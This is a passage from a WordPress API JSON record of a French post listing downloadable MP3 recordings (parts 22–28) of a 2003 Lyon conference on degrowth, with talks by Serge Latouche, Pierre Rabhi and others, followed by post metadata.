3.8 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/21rabhi.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 3.8 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(22\/28) Dur\u00e9e\u00a0: 35\u201904\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">\u00c9changes avec la salle <\/strong><\/p>\n<p class=\"spip\">Jeu de questions\/r\u00e9ponses avec le public.<\/p>\n<dl class=\"spip_document_2423 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 3.8 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/22echanges.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 3.8 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(23\/28) Dur\u00e9e\u00a0: 03\u201918\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">Annonces et perspectives, par Serge Latouche <\/strong><\/p>\n<p class=\"spip\">Serge Latouche<\/p>\n<dl class=\"spip_document_2424 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 374.1 ko\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/23annonceslatouche.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 374.1 ko\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(24\/28) Dur\u00e9e\u00a0: 17\u201908\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">La simplicit\u00e9 volontaire, par Mich\u00e8le Leboeuf<\/strong><\/p>\n<p class=\"spip\">Mich\u00e8le Leboeuf est membre de la communaut\u00e9 de l\u2019Arche<\/p>\n<dl class=\"spip_document_2425 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 1.8 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/24leboeuf.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 1.8 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(25\/28) Dur\u00e9e\u00a0: 19\u201942\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">Vivre simplement dans la ville \u00ab\u00a0, par Michel Bernard <\/strong><\/p>\n<p class=\"spip\">Miche Bernard est fondateur de la revue Silence<\/p>\n<dl class=\"spip_document_2426 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 2.1 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/25bernard.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 2.1 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(26\/28) Dur\u00e9e\u00a0: 19\u201902\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">\u00c9changes avec la salle <\/strong><\/p>\n<p class=\"spip\">Jeu de questions\/r\u00e9ponses avec le public.<\/p>\n<dl class=\"spip_document_2427 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 2 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/26echanges.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 2 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(27\/28) Dur\u00e9e\u00a0: 02\u201941\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">Cl\u00f4ture, par Bruno Clementin <\/strong><\/p>\n<p class=\"spip\">Bruno Clementin<\/p>\n<dl class=\"spip_document_2428 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 303.9 ko\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/27conclusionclementin.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 303.9 ko\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(28\/28) Dur\u00e9e\u00a0: 19\u201924\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">Conclusions <\/strong><\/p>\n<p class=\"spip\">Conclusions, par Serge Latouche, Pierre Rabhi, Jacques Grinevald.<\/p>\n<dl class=\"spip_document_2429 spip_documents spip_documents_center\" style=\"width: 62px;\">\n<dt><a title=\"Zip - 2.1 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/28grinevaldlatoucherabhi.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 2.1 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n","protected":false},"excerpt":{"rendered":"<p>Colloque enregistr\u00e9 les 26 et 27 septembre 2003 \u00e0 Lyon. Avec Ruth Stegassy, Mich\u00e8le Leboeuf, Bruno Clementin, Sylvie Ferrari, Mario Bonaiuti, Silvana De Gleria, Serge Latouche, Jacques Grinevald, Alain Gras, Fran\u00e7ois Brune, Paul Ari\u00e8s, Fran\u00e7ois Schneider, Pierre Rabhi,\u00a0 Sylvain Godinot, &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=1399\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-1399","post","type-post","status-publish","format-standard","hentry","category-documents-les-essentielles"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/1399","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1399"}],"version-history":[{"count":0,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/1399\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1399"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1399"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1399"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}